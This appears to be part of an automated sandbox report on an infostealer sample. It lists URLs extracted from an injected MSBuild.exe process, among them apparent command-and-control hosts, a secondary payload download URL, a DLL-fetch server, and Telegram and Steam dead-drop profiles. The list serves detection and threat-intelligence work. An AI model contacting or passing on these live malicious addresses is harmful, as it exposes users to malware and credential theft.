Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.ECAEBA
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgEBA
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoECAKFBG
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.multipart/form-data;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/Z
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll7
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/mozglue.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll2
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll9
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/nss3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/nss3.dllVO
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/softokn3.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/sql.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dll
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dlle
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80
Source: MSBuild.exe, 00000005.00000002.1773441370.00000000004C0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80/sql.dll
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80ontent-Disposition:
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1774258553.0000000001104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000005.00000002.1773441370.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000005.00000002.1788617415.000000001FFDD000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.5.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GIIEGH.5.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: GIIEGH.5.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GIIEGH.5.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GIIEGH.5.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GIIEGH.5.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowe
Source: CFHIIE.5.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/P
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: VmRHSCaiyc.exe, VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: VmRHSCaiyc.exe, VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjoke
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsa
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsafdmskfj3efskoahttps://steamcommunity.com/profiles/76561199786602107g0b4cMozil
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsax
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: GIIEGH.5.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: GIIEGH.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
